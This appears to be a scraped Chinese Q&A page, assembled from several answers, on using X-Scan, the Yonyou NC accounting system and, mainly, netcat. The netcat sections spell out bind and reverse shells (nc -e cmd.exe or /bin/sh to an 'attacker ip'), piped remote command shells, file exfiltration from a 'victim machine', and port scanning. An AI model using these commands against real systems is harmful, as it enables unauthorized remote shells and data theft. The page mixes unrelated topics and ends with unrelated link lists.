-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默
認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測

192.168.1.1-192.168.255.255網段內主機的所有漏洞,跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測

192.168.1.1-192.168.255.255網段內主機的標准埠狀態,NT弱口令用戶,最大

並發線程數量為150,跳過沒有檢測到開放埠的主機
xscan -file ho

4. 用友nc使用視頻教程或日常使用手冊急!!

手冊可以在這裡面找下:http://wenku..com/search?word=%D3%C3%D3%D1nc&lm=0&od=0
或者http://60.2.99.94/data/jcgc/dfp.doc
視頻在這個網站里有下載:http://bbs.iufida.com/

5. NC用友系統怎麼用

跟所有的財務系統都差不多呀。主要是熟練的過程得花點時間,呵呵。樓主加油,相信你可以的!頂一個!

6. 電腦常識:DOS命令之NC的定義和用法是

NC(netcat)的使用方法!
連接到某處:nc [-options] hostname port[s] [ports].....
監聽某埠等待連接:nc -l -p port [options] [hostname] [port] -options
-d 後台運行
-e prog 程序重定向,一旦有連接,就執行綁定的程序。
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 幫助信息
-i 設定延時時間。
-l 監聽方式,等待連入。連接完成後,結束監聽。
-L 監聽方式,等待連入。連接完成後,繼續監聽。
-n 只能使用ip地址。
-o file 指定要傳送的16進制代碼。
-p port 指定本地的埠號。
-r 隨意指定本地或遠程埠號。
-s addr 本地的源地址。
-t 回顯telnet信息。
-u UDP方式。
-v 顯示詳細的信息,-vv 可獲取更詳細的信息。
-w 指定超時的時間。
-z 用於scan。
以上就是nc的一些參數和選項,注意,這是nt版本的nc。如果是*nix的需要自己編譯。也都差不多,只是netcat.c默認是沒有-t和-e這個兩個參數,要改。
看看它能幹些什麼,(偶就知道這些)
1.埠的刺探:
nc -vv ip port
2.掃描器
nc -v -w 5 ip port-port
nc -v -z ip port-port
3. 後門
victim machine:
nc -l -p port -e cmd.exe
nc -l -p port -e /bin/sh
attacker machine:
nc victim ip -p port
得到一個shell。
4.反向連接
attacker machine:
nc -vv -l -p port
victim machine:
nc -e cmd.exe attacker ip -p port
nc -e /bin/sh attacker ip -p port
或者:
attacker machine:
nc -vv -l -p port1 /*用於輸入*/
nc -vv -l -p prot2 /*用於顯示*/
victim machine:
nc attacker ip port1 | cmd.exe | nc attacker ip port2
nc attacker ip port1 | /bin/sh | nc attacker ip port2
5.傳送文件:
attacker machine <-- victim machine
nc -d -l -p port < path file /*attacker machine*/
nc -vv attacker ip -p port > path file /*victim machine*/
attacker machine --> victim machine
nc -vv -l -p > patm file/*victim machine*/
nc -d victim ip -p port < path file /*attacker machine*/

7. Linux nc命令詳解 Linux nc命令怎麼用

Linux中nc命令是一個功能強大的網路工具,全稱是netcat。

語法:
nc [-hlnruz][-g<網關...>][-G<指向器數目>][-i<延遲秒數>][-o<輸出文件>][-p<通信埠>][-s<來源位址>][-v...][-w<超時秒數>][主機名稱][通信埠...]
參數說明:
-g<網關> 設置路由器躍程通信網關,最丟哦可設置8個。
-G<指向器數目> 設置來源路由指向器,其數值為4的倍數。
-h 在線幫助。
-i<延遲秒數> 設置時間間隔,以便傳送信息及掃描通信埠。
-l 使用監聽模式,管控傳入的資料。
-n 直接使用IP地址,而不通過域名伺服器。
-o<輸出文件> 指定文件名稱,把往來傳輸的數據以16進制字碼傾倒成該文件保存。
-p<通信埠> 設置本地主機使用的通信埠。
-r 亂數指定本地與遠端主機的通信埠。
-s<來源位址> 設置本地主機送出數據包的IP地址。
-u 使用UDP傳輸協議。
-v 顯示指令執行過程。
-w<超時秒數> 設置等待連線的時間。
-z 使用0輸入/輸出模式,只在掃描通信埠時使用。
實例:
1、TCP埠掃描
# nc -v -z -w2 127.0.0.1 1-100
Connection to 127.0.0.1 22 port [tcp/ssh] succeeded!
Connection to 127.0.0.1 53 port [tcp/domain] succeeded!
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
...
nc: connect to 127.0.0.1 port 100 (tcp) failed: Connection refused

2、從192.168.1.2拷貝文件到192.168.1.3
首先在接收端192.168.1.3上: nc -l 1234 > test.txt
然後在發送端192.168.1.2上: nc 192.168.1.3 < test.txt
注意:先運行接收端,指定一個埠為1234,文件為test.txt,再執行發送端,並且發送端必須存在同名的文件test.txt

3、傳輸目錄
從server1(192.168.16.233)拷貝nginx目錄內容到server2(192.168.48.47)上。需要先在server2上,用nc激活監聽,
server2上運行:# nc -l 1234 | tar xzv-
server1上運行:# tar czv- nginx | nc 192.168.48.47 1234

4、簡單聊天工具
在192.168.1.2上: nc -l 1234
在192.168.1.3上: nc 192.168.1.2 1234
這樣,雙方就可以相互交流了。使用ctrl+C(或D)退出

8. linux怎麼使用nc命令來發送一串使用udp協議的數據或者不是NC也可以的命令

echo -n 「foo" | nc -4u -w1 <host> <udp port>
或者
echo -n "hello" >/dev/udp/localhost/8000

9. nc如何使用

一、基本使用
想要連接到某處: nc [-options] hostname port[s] [ports] …
綁定埠等待連接: nc -l -p port [-options] [hostname] [port]
參數:

-e prog 程序重定向,一旦連接,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
G num source-routing pointer: 4, 8, 12, …
-I secs 延時的間隔
-l 監聽模式,用於入站連接
-n 指定數字的IP地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地埠號
-r 任意指定本地及遠程埠
-s addr 本地源地址
-t 以telnet的形式應答
-u UDP模式
-v 詳細輸出——用多個-v可得到更詳細的內容
-z 將輸入輸出關掉——用於掃描時
-w secs timeout的時間
二. 它的簡單使用方法
1.nc -l -p 80
監聽80埠
2.nc -l -p 80 >c:\log.dat
監聽80埠,並把信息記錄到log.dat
3.nc -v -l -p 80
監聽80埠,並顯示埠信息
4.nc -l -p 80 -t -e cmd.exe
監聽本地的80埠的入站信息,同時將cmd.exe重定向至80埠,當有人連接的時候,就讓cmd.exe以telnet的形式應答
5.nc -v ip port
掃描某ip的某個埠
6.nc -v -z ip port-port
掃描某ip的某埠到某埠
7.nc -v -z -u ip port-port
掃描某ip的某udp埠到某udp埠
7.掃描遠程主機
nc -nvv -w2 -z 192.168.x.x 80-445
掃描192.168.x.x的TCP 80到TCP445的所有埠
8.REMOTE主機綁定SHELL
nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
綁定REMOTE主機的CMDSHELL在REMOTE主機的TCP5354埠
9.REMOTE主機綁定SHELL並反向連接
nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
綁定REMOTE主機的CMDSHELL並反向連接到192.168.x.x的TCP5354埠
三.使用的例子
1. 計算機192.168.0.1運行:nc -v -n -p 99
計算機192.168.0.8運行:nc -e cmd.exe 192.168.0.1 99
這樣我們就獲得了192.168.0.8的一個shell
2.計算機192.168.0.1運行:nc -v -n 192.168.0.8 99
計算機192.168.0.8運行:nc -v -l -p 99 >d:\sc.exe
四.高級用法:
1.作攻擊程序用
格式1:type c:\exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:\exploit.txt
連接到192.168.x.x的80埠,並在其管道中發送』c:\exploit.txt』的內容(兩種格式確有相同的效果, 真是有異曲同工之妙)
2.作蜜罐用
nc -L -p 80 > c:\log.txt
使用』-L』可以不停地監聽某一個埠,直到ctrl+c為止,同時把結果輸出到』c:\log.txt』中,如果把』>』 改為』>>』即可以追加日誌
3.作蜜罐用
nc -L -p 80 < c:\honeypot.txt
使用』-L』可以不停地監聽某一個埠,直到ctrl+c為止,並把』c:\honeypot.txt』的內容』送』入其 管道中

閱讀全文

與nc使用方法相關的資料

熱點內容
怎麼扛水泥到車上最輕松的方法 瀏覽:284
華為手機榮耀x截屏方法 瀏覽:607
雄蜂的製作方法視頻 瀏覽:756
農村創業簡單方法 瀏覽:679
個稅計算器計算方法 瀏覽:395
電腦鎖屏按鈕在哪裡設置方法 瀏覽:540
什麼方法可以把手機套弄白 瀏覽:530
對整本書教學方法的理解 瀏覽:1003
道家正一開光的步驟和方法 瀏覽:1002
最簡單的袋子的製作和方法 瀏覽:801
水熬糖色的方法視頻 瀏覽:319
鑒別fe和fe的方法 瀏覽:454
堵漏工具的使用方法 瀏覽:236
統計學中平均速度的計算方法包括 瀏覽:946
龍蝦解凍方法視頻 瀏覽:733
頻域抗震分析方法 瀏覽:601
數紙張基本方法的視頻 瀏覽:833
電源一通電喇叭響解決方法 瀏覽:88
連接三相電機的接線方法 瀏覽:302
袁方社會研究方法筆記 瀏覽:265